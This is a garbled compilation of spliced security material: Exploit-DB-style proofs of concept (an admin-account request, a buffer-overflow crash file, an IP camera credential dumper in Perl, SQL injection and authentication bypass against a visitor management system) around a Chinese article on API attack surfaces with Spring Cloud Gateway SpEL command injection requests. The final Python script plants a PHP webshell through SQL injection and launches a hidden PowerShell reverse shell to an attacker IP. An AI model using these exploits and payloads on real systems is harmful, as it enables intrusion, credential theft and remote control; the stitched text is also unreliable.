User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
account_id=5&name=Janno%2BPalacios&deptid=&username=efe%40omerefe.com&deptid=&pass=efe&type=Administrator&save=
HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 08:20:21 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=7v7av68r870gj66ouhf1sk3260; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 57
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/admin/mod_room/controller.php?action=editimage
#
<html>
<body>
<form action="http://localhost/[PATH]/admin/mod_room/controller.php?action=editimage" enctype="multipart/form-data" method="POST">
<input id="image" name="image" type="file"></td>
<button name="save" type="submit">Save</button>
</form>
</body>
</html>
# POC:
# 3)
# http://localhost/[PATH]/admin/mod_room/index.php?view=view&id=[SQL]
#
#....
# Exploit Title: APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)
# Exploit Author: Ismail Tasdelen
# Exploit Date: 2020-01-16
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/apkf_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install APKF Product Key Finder
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.APKF Product Key Finder Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")
必要性
前后端分离已经成为web的一大趋势,通过Tomcat+Ngnix(也可以中间有个Node.js),有效地进行解耦。并且前后端分离会为以后的大型分布式架构、弹性计算架构、微服务架构、多端化服务(多种客户端,例如:浏览器,车载终端,安卓,IOS等等)打下坚实的基础。而API就承担了前后端的通信的职责。所以学习api安全很有必要。
本文的思路在于总结一些api方面常见的攻击面。笔者在这块也尚在学习中,如有错误,还望各位斧正。
常见的api技术
GraphQL
GraphQL 是一个用于 API 的查询语言
通常有如下特征:
(1)数据包都是发送至/graphql接口
(2)其中包含了很多换行符\n
{"query":"\n query IntrospectionQuery {\r\n __schema {\r\n queryType { name }\r\n mutationType { name }\r\n subscriptionType { name }\r\n types {\r\n ...FullType\r\n }\r\n directives {\r\n name\r\n description\r\n locations\r\n args {\r\n ...InputValue\r\n }\r\n }\r\n }\r\n }\r\n\r\n fragment FullType on __Type {\r\n kind\r\n name\r\n description\r\n fields(includeDeprecated: true) {\r\n name\r\n description\r\n args {\r\n ...InputValue\r\n }\r\n type {\r\n ...TypeRef\r\n }\r\n isDeprecated\r\n deprecationReason\r\n }\r\n inputFields {\r\n ...InputValue\r\n }\r\n interfaces {\r\n ...TypeRef\r\n }\r\n enumValues(includeDeprecated: true) {\r\n name\r\n description\r\n isDeprecated\r\n deprecationReason\r\n }\r\n possibleTypes {\r\n ...TypeRef\r\n }\r\n }\r\n\r\n fragment InputValue on __InputValue {\r\n name\r\n description\r\n type { ...TypeRef }\r\n defaultValue\r\n }\r\n\r\n fragment TypeRef on __Type {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n ","variables":null}SOAP-WSDL
WSDL (Web Services Description Language,Web服务描述语言)是一种XML Application,他将Web服务描述定义为一组服务访问点,客户端可以通过这些服务访问点对包含面向文档信息或面向过程调用的服务进行访问走的是SOAP协议,一般发送的xml格式的数据,然后会有WSDL文件
.net中常见的.asmx文件也有wsdl格式 xxx.asmx?wsdl
我们可以使用soapui对这类api进行测试
WADL
文件里面有很明显的wadl标志
同样也可以用soapui的rest功能进行测试
REST
rest api并不像前面几种那种特征明显,也是如今使用最多的一种api技术
REST 是一组架构规范,并非协议或标准。API 开发人员可以采用各种方式实施 REST。
当客户端通过 RESTful API 提出请求时,它会将资源状态表述传递给请求者或终端。该信息或表述通过 HTTP 以下列某种格式传输:JSON(Javascript 对象表示法)、HTML、XLT、Python、PHP 或纯文本。JSON 是最常用的编程语言,尽管它的名字英文原意为“JavaScript 对象表示法”,但它适用于各种语言,并且人和机器都能读。
还有一些需要注意的地方:头和参数在 RESTful API HTTP 请求的 HTTP 方法中也很重要,因为其中包含了请求的元数据、授权、统一资源标识符(URI)、缓存、cookie 等重要标识信息。有请求头和响应头,每个头都有自己的 HTTP 连接信息和状态码。获取端点的方式
对于api的一些安全测试,通常关注api的权限问题,api端点和基础设施的安全问题。
要测试api端点的安全问题,肯定得尽量获取多的api端点
swagger api-docs泄露
Swagger 是一个规范和完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务
常见指纹:
# swagger 2 /swagger-ui.html /api-docs /v2/api-docs # swagger 3 /swagger-ui/index.html
/api-docs /v2/api-docs /v3/api-docs ...
api-docs可泄露所有端点信息
这里推荐两个工具进行测试
第一个是swagger-editor
https://github.com/swagger-api/swagger-editor
下载之后打开index.html就可以用,可以选择导入或者远程加载url,支持json和yaml格式的api-docs
第二个是apikit https://github.com/API-Security/APIKit
burp插件
graphql内省查询
获取所有端点信息
https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ
{"query":"\n query IntrospectionQuery {\r\n __schema {\r\n queryType { name }\r\n mutationType { name }\r\n subscriptionType { name }\r\n types {\r\n ...FullType\r\n }\r\n directives {\r\n name\r\n description\r\n locations\r\n args {\r\n ...InputValue\r\n }\r\n }\r\n }\r\n }\r\n\r\n fragment FullType on __Type {\r\n kind\r\n name\r\n description\r\n fields(includeDeprecated: true) {\r\n name\r\n description\r\n args {\r\n ...InputValue\r\n }\r\n type {\r\n ...TypeRef\r\n }\r\n isDeprecated\r\n deprecationReason\r\n }\r\n inputFields {\r\n ...InputValue\r\n }\r\n interfaces {\r\n ...TypeRef\r\n }\r\n enumValues(includeDeprecated: true) {\r\n name\r\n description\r\n isDeprecated\r\n deprecationReason\r\n }\r\n possibleTypes {\r\n ...TypeRef\r\n }\r\n }\r\n\r\n fragment InputValue on __InputValue {\r\n name\r\n description\r\n type { ...TypeRef }\r\n defaultValue\r\n }\r\n\r\n fragment TypeRef on __Type {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n ","variables":null}
我们可以用这个生成接口文档:
https://github.com/2fd/graphdoc
需要nodejs test.json是刚刚内省查询返回的json格式数据
npm install -g @2fd/graphdoc graphdoc -s ./test.json -o ./doc/schema
然后我们打开生成的/doc/index.html
根据他这个格式构造数据包就行了
其他
在黑盒测试中,很大一个问题就是api端点找得不够全,我们需要从对应的应用或者从其他方面找
(1)web
js html等静态资源可以有一些api端点
burp插件JS LinkFinder可以被动收集
(2)app和其他客户端应用
(3)github
(4)根据规律fuzz
鉴权方式
Basic Auth
每次请求API时都提供用户的username和password
通常在http数据包中有一个Authorization头
Authorization: Basic base64(username:password)
这个安全性比较低,现在很少用到
JWT
jwt(json web token)是一种基于 Token 的认证授权机制
分为三部分
- Header : 描述 JWT 的元数据,定义了生成签名的算法以及 Token 的类型。
- Payload : 用来存放实际需要传递的数据
- Signature(签名) :服务器通过 Payload、Header 和一个密钥(Secret)使用 Header 里面指定的签名算法(默认是 HMAC SHA256)生成 防止 JWT被篡改
计算方式 加密算法( base64(header) + "." + base64(payload), secret)
在线测试https://jwt.io/
普通token需要后端存储与用户的对应关系,而JWT自身携带对应关系
其他自定义头、cookie
诸如apikey 或者随机生成的其他形式的token
常见安全问题及测试方法
api网关
API 网关是一个搭建在客户端和微服务之间的服务,我们可以在 API 网关中处理一些非业务功能的逻辑,例如权限验证、监控、缓存、请求路由等。
API 网关就像整个微服务系统的门面一样,是系统对外的唯一入口。有了它,客户端会先将请求发送到 API 网关,然后由 API 网关根据请求的标识信息将请求转发到微服务实例。
apisix
Apache APISIX 是 Apache 软件基金会下的云原生 API 网关,它兼具动态、实时、高性能等特点,提供了负载均衡、动态上游、灰度发布(金丝雀发布)、服务熔断、身份认证、可观测性等丰富的流量管理功能。我们可以使用 Apache APISIX 来处理传统的南北向流量,也可以处理服务间的东西向流量。同时,它也支持作为 K8s Ingress Controller 来使用。apisix之前爆出过一个命令执行漏洞CVE-2022-24112 (目前最新版本是3.0)
影响范围:
Apache APISIX 1.3 ~ 2.12.1 之间的所有版本(不包含 2.12.1 )
Apache APISIX 2.10.0 ~ 2.10.4 LTS 之间的所有版本(不包含 2.10.4)搭建漏洞环境
git clone https://github.com/twseptian/cve-2022-24112 ##获取dockerfile文件
cd cve-2022-24112/apisix-docker/example/ ##进入相应目录
docker-compose -p docker-apisix up -d ##启动基于docker的apisix所有服务利用条件
batch-requests插件默认开启状态。
用户使用了 Apache APISIX 默认配置(启用 Admin API ,使用默认 Admin Key 且没有额外分配管理端口),攻击者可以通过 batch-requests 插件调用 Admin API 。攻击思路
1、利用batch-requests 插件漏洞、绕过请求头检测;
2、通过伪造请求头、向Admin API 注册路由;
3、注册路由时、携带参数filter_func 传递 lua代码、造成远程代码执行漏洞exp:
https://github.com/twseptian/cve-2022-24112/blob/main/poc/poc2.py
Spring Cloud Gateway
Spring Cloud Gateway 是 Spring Cloud 团队基于 Spring 5.0、Spring Boot 2.0 和 Project Reactor 等技术开发的高性能 API 网关组件当Spring Cloud Gateway启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击
影响版本
Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
Spring Cloud Gateway 其他已不再更新的版本这个漏洞本身是一个SpEL注入
攻击方法:
第一步 添加路由 value参数传入了执行cmd的el表达式
POST /test/actuator/gateway/routes/AAAAAAAAAAAAAAAA HTTP/1.1
Host: xxx.com:9090
User-Agent: xxx
Content-Length: xxx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/json
Accept-Encoding: gzip, deflate
Connection: close
{
"id": "AAAAAAAAAAAAAAAA",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"whoami\").getInputStream()))}"
}
}],
"uri": "http://xxx.com:9090/test/actuator/"
}第二步 刷新配置
POST /test/actuator/gateway/refresh HTTP/1.1
Host: xxx:9090
User-Agent: xxx
Content-Length: 0
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close第三步,获取命令执行结果
GET /test/actuator/gateway/routes/AAAAAAAAAAAAAAAA HTTP/1.1
Host: xxxx:9090
User-Agent: xxx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Encoding: gzip, deflate
Connection: close清除痕迹:
DELETE /test/actuator/gateway/routes/AAAAAAAAAAAAAAAA HTTP/1.1
Host: xxx
User-Agent: xxx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Encoding: gzip, deflate
Connection: closetraefik
这个倒是没爆出过什么漏洞,实战中遇到过几次dashboard存在未授权访问的情况,
这个dashboard没法直接部署容器啥的
但是可以从它http->http routers这里看到一些路由转发规则,比如host path,对于后续的渗透有一些帮助,可以知道一些二级目录和域名
还有其他页面比如http services会泄露一些内网ip等等
actuator
未授权访问
默认只开放 health
如果在application.properties添加了
management.endpoints.web.exposure.include=*
或者application.yml添加
management:
endpoints:
web:
exposure:
#默认值访问health,info端点 用*可以包含全部端点
include: "*"
endpoint:
health:
show-details: always #获得健康检查中所有指标的详细信息则会暴露所有端点(endpoints)
此时这些端点就存在未授权访问
利用方法大部分这篇文章已经讲了https://github.com/LandGrey/SpringBootVulExploit
这里不再重复提及
heapdump获取shiro key
测试环境:https://github.com/ruiyeclub/SpringBoot-Hello/tree/master/springboot-shiro
下载heapdump /actuator/heapdump
jvisualvm.exe:Java自带的工具,默认路径为:JDK目录/bin/jvisualvm.exe
打开heapdump, 搜索org.apache.shiro.web.mgt.CookieRememberMeManager
然后双击这个类,找到key,右边是key的值
复制
-83, 105, 9, -110, -96, 22, -27, -120, 23, 113, 108, -104, -1, -35, -6, -111
转换的python脚本:
import base64 import struct print(base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb', -83, 105, 9, -110, -96, 22, -27, -120, 23, 113, 108, -104, -1, -35, -6, -111)))
或者使用https://github.com/whwlsfb/JDumpSpider/releases
java -jar JDumpSpider-1.0-SNAPSHOT-full.jar heapdump
后端代码安全问题
api后端的应用也是由代码写出来的,各种web安全问题依旧会存在,比如sql注入 文件上传等等,这里提一个遇到比较多的越权问题和一个比较有意思的xxe漏洞
越权
(1)参数污染
为单个参数提供多个值
GET /api/user?id={userid}
=>
GET /api/user?id={userid1}&id={userid2}(2)附加特殊字符和随机字符串
简单地替换 id 可能会导致 40x等情况。可以尝试添加一些特殊字符
/ %20、%09、%0b、%0c、%1c、%1d、%1e、%1fGET /api/user/1
=>
GET /api/user/1%20(3)添加查询参数
url中可能并没有参数,可以自己添加一些字段(可以是网站返回的,也可以是常见的一些比如id username等等):
比如
GET /api/user
=>
GET /api/user?id=1
GET /api/user?userid=1
GET /api/user?username=1
...(4)修改动作
常见有增删改查
比如
GET /api/edit/user/1
=>
GET /api/detele/user/1
PUT /api/user 新增
=>
DETELE /api/user/1 尝试删除xxe
api为了兼容一些不同的应用场景比如小程序、app等等,可能会兼容不同的数据传输格式
比如之前一个银行的测试,接口传输数据采用的是json格式
将json格式数据改为xml格式时,发现存在xml外部实体注入漏洞(xxe)
鉴权绕过思路
伪造jwt token
有些网站,访问时会给你一个jwt token,但是payload部分很多字段是空的,这个时候可以去尝试去修改payload中,可能和身份认证相关的字段,伪造jwt token。
伪造就需要解决签名问题
(1)修改签名算法为none
(2)爆破签名的密钥
(3)伪造密钥
...
可以使用jwt_tool进行测试
https://github.com/ticarpi/jwt_tool
Spring-security 认证绕过漏洞
CVE-2022-22978
影响版本:
Spring Security 5.5.x < 5.5.7
Spring Security 5.6.x < 5.6.4
在spring-security中利用换行符可实现权限认证进行绕过,\r的URl编码为%0d,\n的URL编码为%0a
比如:
/admin/1 -> 需要认证
/admin/1%0d%0a -> 绕过认证shiro权限绕过
举两个例子
(1)CVE-2020-1957
影响版本: shiro < 1.5.2
shiro与spring的URI中对;处理不同,导致绕过
比如http://127.0.0.1:8080/;/admin,shiro则是认为是访问http://127.0.0.1:8080/
比如http://127.0.0.1:8080/;/admin,spring则是认位是访问http://127.0.0.1:8080/admin
这就造成了与shiro处理⽅式的差异,shiro是直接截断后⾯所有部分,⽽spring只会截断【分号之后,斜杠之前】的部分/admin/ -> 403
/;aaaa/admin/ -> 200
(2)CVE-2020-13933
影响版本: shiro < 1.6.0
访问/admin/index 需要认证
而/admin/%3bindex,能够绕过认证:其他
这里就是一些经验之谈
(1)github、前端的js以及app中可能存在一些测试的token
(2)测试站点的凭据可能在正式站点上面也有效
(3)有些应用有toB toC不同的接口,在校验不严格的情况下,toC端的凭据可能能用在toB端的接口认证上,比如某次漏洞挖掘中小程序用户登录获取token,可以用在商家端的一些api绕过认证。
参考
https://github.com/API-Security/APIKit
https://github.com/OWASP/API-Security
https://www.cnblogs.com/tomyyyyy/p/15134420.html
https://www.cnblogs.com/zpchcbd/p/15023056.html
https://www.freebuf.com/vuls/343980.html
https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ
https://mp.weixin.qq.com/s?__biz=Mzg3NDcwMDk3OA==&mid=2247484068&idx=1&sn=89ea1b1be48a0cb7f93a4750765719d1&chksm=cecd8b79f9ba026f7fbf52771e41272d684fc3af5175587f768082f8dbaee12d6d33bb892ceb&scene=21#wechat_redirect
https://apisix.apache.org/zh/docs/apisix/getting-started/
https://zhuanlan.zhihu.com/p/569328044
https://www.cnblogs.com/9eek/p/16243402.html
http://c.biancheng.net/springcloud/gateway.html
原文连接: https://xz.aliyun.com/t/11977
*# Exploit Title: Apexis IP CAM - Full Info Disclosure **
**# Google Dork: inurl:"get_status.cgi"cgi-bin/**
**# Date: 01/06/2015**
**# Exploit Author: Sunplace Solutions - Soluciones Informáticas - #RE
Remoteexecution.net**
**# Vendor Homepage: http://www.apexis.com.cn/**
**# Tested on: Linux**
*
*Models Afected :**
**
**APM-H602-MPC**
**APM-H803-MPC**
**APM-H901-MPC**
**APM-H501-MPC**
**APM-H403-MPC**
**APM-H804*
_*
*__*Usage: please enter the url ipcam Example : *_
http://server/cgi-bin/get_status.cgi o
http://server/cgi-bin/get_tutk_account.cgi
_*You get something like this*__*:*_
[Sunplace@solutions ]$ perl xploit.pl
[ Apexis IP CAM - Full Info Disclosure ]
[ Discovery by: Sunplace Solutions ]
[ Exploit: Sunplace Solutions - Daniel Godoy ]
[ Greetz: www.remoteexecution.net - ]
URL: http://server/cgi-bin/get_tutk_account.cgi
[x]Trying to pwn =>/get_tutk_account.cgi
Result:
tutk_result=1;
tutk_guid='FBX9937PJG273MPMMRZJ';
tutk_user='admin';
tutk_pwd='lolo2502';
[x]Trying to pwn => /get_tutk_account
Result:
tutk_result=1;
tutk_guid='FBX9937PJG273MPMMRZJ';
tutk_user='admin';
tutk_pwd='lolo2502';
[x]Trying to pwn => /get_extra_server.cgi
Result:
extraserv_result=1;
server_enable=0;
server_ipaddr='192.168.1.220';
server_port=6666;
server_time=10;
_*Index of /cgi-bin/ example:*_
backup_params.cgi
check_user.cgi
clear_log.cgi
control_cruise.cgi
decoder_control.cgi
delete_sdcard_file.cgi
download_sdcard_file.cgi
format_sdc.cgi
get_alarm_schedule.cgi
get_camera_vars.cgi
get_cruise.cgi
get_extra_server.cgi
get_list_cruise.cgi
get_log_info.cgi
get_log_page.cgi
get_maintain.cgi
get_motion_schedule.cgi
get_params.cgi
get_preset_status.cgi
get_real_status.cgi
get_sdc_status.cgi
get_status.cgi
get_sycc_account.cgi
get_tutk_account.cgi
get_wifi_scan_result.cgi
mobile_snapshot.cgi
reboot.cgi
And more......
_*[Exploit Code]*__*
*_
#!/usr/bin/perl
print "[ Apexis IP CAM - Full Info Disclosure ]\n";
print "[ Discovery by: Sunplace Solutions ]\n";
print "[ Exploit: Sunplace Solutions ]\n";
print "[ Greetz: www.remoteexecution.net - Daniel Godoy ]\n";
print "URL: ";
$url=<STDIN>;
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/35.0 (compatible; MSIE 5.0; Windows 7)');
chop($url);
if ($url eq "")
{
print 'URL dont empty!.'."\n";
}
else
{
$www = new LWP::UserAgent;
@path=split(/cgi-bin/,$url);
$content = $www->get($url) or error();
print "\n[x]Trying to pwn =>".$path[1]."\n";
print "Result: \n";
$pwn = $content->content;
$pwn=~ s/var//g;
$pwn=~ s/ //g;
$pwn=~ s/ret_//g;
print $pwn;
print "\n[x]Trying to pwn => /get_tutk_account\n";
print "Result: \n";
$content = $www->get($path[0]."cgi-bin/get_tutk_account.cgi") or
error();
$pwn = $content->content;
$pwn=~ s/var//g;
$pwn=~ s/ret_//g;
$pwn=~ s/ //g;
print $pwn;
print "\n[x]Trying to pwn => /get_extra_server.cgi\n";
print "Result: \n";
$content = $www->get($path[0]."cgi-bin/get_extra_server.cgi") or
error();
$pwn = $content->content;
$pwn=~ s/var//g;
$pwn=~ s/ret_//g;
$pwn=~ s/extra_//g;
$pwn=~ s/ //g;
print $pwn;
}
# Exploit Title: Apartment Visitors Management System 1.0 - Authentication Bypass
# Date: 2020-12-24
# Exploit Author: Kshitiz Raj(manitorpotterk)
# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
# Version: V1.0
# Tested on: Windows 10/Kali Linux
Step 1 - Go to url http://localhost/avms/index.php
<http://localhost/avms/index.php>*
Step 2 – Enter Username :- ' or '1'='1'# *
Step 3 - Enter Password - anything*
# Exploit Title: Apartment Visitors Management System 1.0 - 'email' SQL Injection
# Date: 20.01.2021
# Exploit Author: CANKAT ÇAKMAK
# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
# Version: V1.0
# Tested on: Windows 10
----------------------------------------------------
POST /avms/forgot-password.php HTTP/1.1
Host: test.com
Content-Length: 42
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: test.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://test.com/avms/forgot-password.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
email=test%40gmail.com&contactno=1&submit=
----------------------------------------------------
poC:
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=test@gmail.com' AND (SELECT 2600 FROM
(SELECT(SLEEP(5)))jpeB) AND 'WVFv'='WVFv&contactno=1&submit=
# Exploit Title: Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection
# Date: 2021-08-13
# Exploit Author: mari0x00
# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
# Version: 1.0
# Tested on: Windows 10 + XAMPP
#!/usr/bin/python3
import requests, socket, threading
import base64, time, sys
print(('''###########################################################''',"red"))
print(('''########### AVMS SQLi to RCE by mari0x00 ############''',"red"))
print(('''###########################################################''',"red"))
print("")
URL = input("Provide URL for AVMS (e.g. 'http://localhost/avms/'): ") or 'http://localhost/avms/'
path = input("Provide path for shell upload (default 'C:\\xampp\\htdocs\\avms\\lol.php'): ") or 'C:\\xampp\\htdocs\\avms\\lol.php'
path = path.replace("\\", "\\\\")
rhost = input("Provide attacker IP: ") or "127.0.0.1"
rport = input("Provide attacker listening port: ") or "1337"
# sending webshell
payload = {"username": "admin' union select '<?php system(base64_decode($_GET[\"cmd\"]));?>' into outfile '" + path + "' -- 'a", "password": "test", "login": ''}
requests.post(URL, data=payload)
def shell(rhost, rport):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind((rhost, int(rport)))
except socket.error as msg:
print("Bind failed. Error Code : " + str(msg[0]) + " Message " + msg[1])
sys.exit()
s.settimeout(5)
s.listen(5)
print('[+] Waiting for connection..')
conn = False
command=''
while conn == False:
try:
conn, addr = s.accept()
print("Got a connection from " + addr[0] + ":" + str(addr[1]))
conn.send('\n'.encode())
time.sleep(1)
print(conn.recv(0x10000).decode())
while(command != 'exit'):
command=input('')
conn.send((command + '\n').encode())
time.sleep(.3)
res = conn.recv(0x10000)
print(res.decode())
s.close()
sys.exit("[!] Program exited")
except socket.timeout:
pass
def start_shell(rhost, rport):
revshell = "powershell -nop -NonI -W Hidden -Exec Bypass -c \"$client = New-Object System.Net.Sockets.TCPClient('" + rhost + "'," + rport + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\""
revshell = revshell.encode('ascii')
revshell = base64.b64encode(revshell)
revshell = revshell.decode('ascii')
connection = requests.get(URL+"/lol.php?cmd=" + revshell)
print("[+] Starting to listen on port " + rport)
time.sleep(0.5)
threading.Thread(target=shell, args=(rhost, rport)).start()
time.sleep(2)
print("[+] Sending the reverse shell payload")
threading.Thread(target=start_shell, args=(rhost, rport)).start()